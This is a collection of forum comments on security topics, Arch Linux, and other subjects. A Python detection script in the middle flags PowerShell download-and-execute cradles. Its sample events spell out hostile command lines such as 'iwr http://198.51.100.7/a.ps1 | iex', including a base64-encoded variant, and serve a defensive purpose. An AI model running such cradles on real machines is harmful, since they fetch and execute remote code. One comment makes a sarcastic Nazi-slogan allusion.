Porn.
All six of them, just different forms of porn.
Ya, I know that’s exactly what’s going to happen. But, you have to start somewhere. Just getting management used to the idea that data must be encrypted is a start. That will then push the software vendors in the space to make fundamental changes, which will hopefully improve things a bit.
I actually have a pretty good example from my time in the US FedGov space. We were required (by our checkbox security) to enforce FIPS-140 compliance on all our systems. When working to set up a server for a new product, it just would not run with FIPS-140 in enforcement mode; so, I started digging into the product and found that they were still using the MD5 algorithm in their user password hashing process. Given how much the vendor really wanted our business (we were their “foot in the door” for more FedGov money), I sent an email to our customer service rep essentially saying “ya, MD5 as part of the password hashing is a deal breaker”. A couple weeks later a new version of the product dropped and surprise, surprise, MD5 was no longer part of the password hashing process.
The reliance on checkboxes sucks; but, they can be a useful club to make improvements. A shift to real security takes time and a lot of effort. But, that journey starts with a first step.
While I’m not a fan of checkbox security, given that major parts of the healthcare industry don’t even seem to get over that bar, maybe it’s time to put something in place to give network defenders a lever to pull on to get the basics sorted.
Not having MFA and encryption for data at rest should be treated as willful negligence when a company is breached.
Threat actors used an existing backdoor in a communications system to intercept communications in that system? Color me whatever the opposite of “shocked” is. This is exactly the problem which was brought up by security researchers when the NSA was asking for a frontdoor which would let them break encryption. Thankfully, we held the line in that battle of the Crypto Wars. But, the war never ends and we need to make sure folks remember this clusterfuck the next time the NSA starts pushing to break encryption.
But is #7 true if they don’t have a backup?
Na, my experience is that Defender is fine with users downloading browsers and “updates” from random Russian sites. It’s happy to let the users install that software and only bothers to log a “hey, maybe this was bad” alert some time later. Edge, on the other hand, loses its shit when you visit the official download sites for Chrome or Firefox.
BLUF: It’s been a mixed bag, but I would call it “worth it”.
I’ve used Ubuntu a bit before. That’s what my home server runs on and has for years. Granted, most of its functions live in Docker containers. I also used both Debian (via Kali) and Ubuntu at work (yes, I know Ubuntu is Debian based, but it’s also big enough to have its own dedicated ecosystem). I work in Cybersecurity and use Linux based tools for image acquisition, digital forensics and data recovery. Kali makes for a great “it just works” system to validate vulnerabilities and poke at a network. And, between a lot of tools targeting Ubuntu and frameworks like SANS SIFT, Ubuntu gets used a lot. I also supported several Red Hat based servers at work for various tools. I’m far from an expert on Linux, but I can usually hold my own.
In a lot of ways, Arch wasn’t an obvious choice for me. And I seriously considered going with Ubuntu (or another Debian based OS (e.g. PopOS)) at first. It’s worth mentioning that my primary use for my desktop is video games. So, that heavily affected my choices. That said, the reasons for choosing Arch ended up being:
One of the things I did, which was really helpful, was a “try before you buy” setup. I was coming from Windows 10. And, as mentioned above, gaming was my main use case. So, that had to work for me to make the jump. Otherwise, I was going to milk Windows 10 for as long as possible and then figure things out when it went EOS. So, I installed Arch on a USB 3.0 thumbdrive and left my Windows OS partition alone. I also mounted my “Games” drive (M.2 SSD) and installed games to that. It was still NTFS, but that only created minor bumps in the road. Running that configuration for a couple months proved out that Arch was going to work for me.
When it came time to fully change over, I formatted my Windows OS partition as ext4, set up the correct folder structure and rsync’d everything from the thumbdrive to it. So, everything was the way I’d had it for those couple months. I did have an issue that my BIOS refused to see the OS partition on the SATA SSD I used for my OS partition; but, that was MSI’s fault (I have an MSI motherboard). And that was resolved by changing where GRUB is located in my /boot partition.
Overall, I’ve been happy with the choice I made. Arch hasn’t always been easy. Even the Official Install Guide seems to come from a RTFM perspective. But, if you’re willing to put the time into it, you will learn a lot or you won’t have a functional system. And you’ll end up with a system where you can fire up a packet capture and have a really good idea of what each and every packet is about. As for gaming, so far I’ve had exactly one game which didn’t run on Linux. That was Call of Duty 6, which I was considering giving a go to play with some folks I know. But, Activision’s Anti-Cheat software is a hard “no” on Linux. So, I had to pass on that. Otherwise, every game I have wanted to play either had native Linux support or worked via Proton/WINE.
You only get a short time with the pointy end of the spear and then once a sword wielder is inside your range, you’ve got an unwieldy stick and they have a sword. Good for stand off melee maybe but prob not.
Yes, but getting in close without getting stabbed is really hard.
Here’s an actual example of modern HEMA folks giving it a lot of goes:
https://www.youtube.com/watch?v=uLLv8E2pWdk
I have a Cuisinart grind and brew, which is pushing a decade old at this point. Love the thing and will replace it with something similar if it dies before I do. But, I use Ubuntu on my server and Arch on my desktop. So, not that this meme fits, but it is funny.
the minister of the interior can deport people for a period of up to 20 years to the besieged Gaza Strip or another location based on the “circumstances”
But don’t worry.
Work will make them free!
Do I even need the /s?
The diver probably has some food on him, which the stingray is trying to get.
I visited Stingray City in Grand Cayman a lot of years back. Part of the tour package was that they gave you small squid to feed to the stingrays, and they would climb up you, out of the water for that snack. Also, there were a lot of stingrays in the area. We were instructed to shuffle our feet as we walked, to avoid stepping on one. The swimmer in the picture only needed to hang out for a bit before one or more stingrays would have come over, looking for any handouts.
That said, the experience of Stingray City was absolutely worth it. Between that, and snorkeling at the barrier reef, I have a lot of fond memories of my time at Grand Cayman.
Ya, absolutely. My point was that we shouldn’t assume that vendors are doing things right all the time. So, it’s important to have those layered defenses, because vendors do stupid stuff like this.
This is a good example of why a zero trust network architecture is important. This attack would require the attacker to be able to SSH to the management interface of the device. Done right, that interface will be on a VLAN which has very limited access (e.g. specific IPs or a jumphost). While that isn’t an impossible hurdle for an attacker to overcome, it’s significantly harder than just popping any box on the network. People make mistakes all the time, and someone on your network is going to fall for a phishing attack or malicious redirect or any number of things. Having that extra layer, before they pop the firewall, gives defenders that much more time to notice, find and evict the attacker.
Also, Whiskey, Tango, Foxtrot Cisco?
Seen this one in my work environment. Confusing as heck the first time. It looks like explorer.exe in the context of the local user starts PowerShell.exe with a command line involving an Invoke-WebRequest piping the download into an Invoke-Expression (usually the shorter iex alias). No .lnk or .js file involved. Just explorer, PowerShell, infected.
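Detection logic for the process chain described in that comment, as an added example; this is not the commenter's code or any vendor's rule. It scores process-creation events (a Sysmon Event ID 1 style shape is assumed) where PowerShell is started with an Invoke-WebRequest/iwr result fed into Invoke-Expression/iex, rates an explorer.exe parent as high severity, and also decodes a -EncodedCommand blob so the same cradle is caught when it is base64 wrapped. The sample events, the 198.51.100.0/24 hosts and the field names are constructed.

```python
import base64
import re

# Cmdlet names and their built-in aliases as they appear in the observed cradle.
DOWNLOAD = r"(?:Invoke-WebRequest|iwr)"
EXEC = r"(?:Invoke-Expression|iex)"

CRADLE_PATTERNS = [
    # "iwr <url> | iex": the download is piped straight into Invoke-Expression.
    re.compile(DOWNLOAD + r"\b[^|]*\|\s*" + EXEC + r"\b", re.IGNORECASE),
    # "iex (iwr <url>)": the same cradle with the download nested as an argument.
    re.compile(EXEC + r"\s*\(\s*" + DOWNLOAD + r"\b", re.IGNORECASE),
]

# -e / -ec / -enc / -EncodedCommand followed by a base64 blob (UTF-16LE script).
# Assumption: only these abbreviations are handled in this example.
ENCODED_ARG = re.compile(r"-e(?:c|nc|ncodedcommand)?\s+([A-Za-z0-9+/=]{8,})", re.IGNORECASE)


def decode_encoded_command(cmdline):
    """Return the script carried by an -EncodedCommand argument, or None."""
    m = ENCODED_ARG.search(cmdline)
    if not m:
        return None
    try:
        return base64.b64decode(m.group(1), validate=True).decode("utf-16-le")
    except (ValueError, UnicodeDecodeError):
        return None


def find_cradle(cmdline):
    """Return the cradle text matched in the plain or decoded command line, else None."""
    candidates = [cmdline]
    decoded = decode_encoded_command(cmdline)
    if decoded:
        candidates.append(decoded)
    for text in candidates:
        for pattern in CRADLE_PATTERNS:
            m = pattern.search(text)
            if m:
                return m.group(0)
    return None


def _basename(path):
    return path.lower().rsplit("\\", 1)[-1]


def evaluate(event):
    """Score one process-creation event; return a finding dict or None."""
    if _basename(event["image"]) not in ("powershell.exe", "pwsh.exe"):
        return None
    cradle = find_cradle(event["cmdline"])
    if cradle is None:
        return None
    # explorer.exe as the parent is the chain reported in the thread; other
    # parents still produce a finding, at lower severity.
    severity = "high" if _basename(event["parent"]) == "explorer.exe" else "medium"
    return {"severity": severity, "parent": event["parent"], "cradle": cradle}


def scan(events):
    """Run evaluate() over a list of events and return the findings."""
    return [finding for finding in (evaluate(e) for e in events) if finding]


# Constructed sample telemetry (not real events). The fourth event wraps the
# cradle in -EncodedCommand, built here so the base64 is exact.
PS = r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"
ENCODED_SAMPLE = base64.b64encode(
    "iwr http://198.51.100.7/b.ps1 | iex".encode("utf-16-le")).decode("ascii")
SAMPLE_EVENTS = [
    {"parent": r"C:\Windows\explorer.exe", "image": PS,
     "cmdline": 'powershell.exe -nop -w hidden -c "iwr http://198.51.100.7/a.ps1 | iex"'},
    {"parent": r"C:\Windows\explorer.exe", "image": PS,
     "cmdline": "powershell.exe"},  # user simply opened a shell: no finding
    {"parent": r"C:\Windows\System32\cmd.exe", "image": PS,
     "cmdline": 'powershell -c "iex (iwr http://198.51.100.7/c.ps1)"'},
    {"parent": r"C:\Windows\explorer.exe", "image": PS,
     "cmdline": f"powershell.exe -nop -w hidden -enc {ENCODED_SAMPLE}"},
    {"parent": r"C:\Windows\explorer.exe", "image": PS,
     "cmdline": "powershell.exe Invoke-WebRequest -Uri https://example.com/f.zip -OutFile f.zip"},  # download only
]

if __name__ == "__main__":
    for finding in scan(SAMPLE_EVENTS):
        print(finding)
```

Three of the five constructed events produce findings: the plain pipe and the encoded pipe from explorer.exe at high severity, and the nested form from cmd.exe at medium. The bare shell and the download-to-file command line do not fire, which is the distinction worth keeping in a real rule so it stays quiet on routine administration.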
WeChat’s software has security issues? Color me shocked. Shocked, I tell you.
Well, not that shocked.
Also:
WeChat’s custom encryption protocol
Someone is trying to re-create the virus from Snow Crash
The Company believes the unauthorized actor exfiltrated certain encrypted internal ADT data associated with employee user accounts during the intrusion. Based on its investigation to date, the Company does not believe customers’ personal information has been exfiltrated, or that customers’ security systems have been compromised. ADT’s containment measures have resulted in some disruptions to the Company’s information systems, and the Company’s investigation is at an early stage and ongoing.
This reads a lot like a domain controller got popped. Considering that this is the second breach in a short time, and the previous one got access to customer data, I wouldn’t be surprised to find out that it’s either the same attacker or this breach was an access broker who sold credentials to the previous attacker.
That’s just my guess, and I doubt we will ever get a sufficiently detailed write-up to know. But, it seems like a likely way for the attacks to go down.
Aren’t they inherently less secure than a TOTP code?
They can be, depending on the types of threats you expect to face. If physical theft is an expected threat, then a hardware token runs the risk of being stolen and abused. For example, your attackers might just buy off cops to rob you and take your stuff. Having the physical device locked with a PIN/Passcode can mitigate this threat somewhat. But, that just becomes another password the attackers need to figure out.
On the other side of the coin, TOTP applications have started offering Cloud Backup options for accounts. What this demonstrates is that it’s possible to move those accounts between devices remotely. A hacked device means those codes may be exfiltrated to an attacker’s device and you will be none the wiser. Good security hygiene and device hardening can help mitigate these issues. But, it also means you need to place a lot of trust in a lot of third parties. Also, you need to be unimportant enough for an attacker to not burn a 0-day on.
Ultimately, security is all about trade-offs. If you worry about physical security and don’t expect to face a threat which might compromise your phone, then a TOTP app might be a better option. If you are more worried about a hacked device being used to leak credentials, then a physical token may be a better choice. Each way you go has some ability to mitigate the risks. PIN for a physical token and device hardening for TOTP. But, neither is a silver bullet.
And, if your threat model includes someone willing and able to engage in rubber hose cryptanalysis, then you’re probably fucked anyway.
I’ve heard that in the US, the 5th amendment protects you from being forced to divulge a password, but they can physically place your finger on the finger print scanner.
Ya, it’s a weird space that you cannot be legally forced to divulge a password, except in cases where the content of the drive is a “foregone conclusion” (as defined by the US Supreme Court). But, they can absolutely collect biometric markers (including forcing a fingerprint scan).
They did.
While it’s been co-opted by shitheads these days, the Gadsden Flag started off as something pretty close to a meme.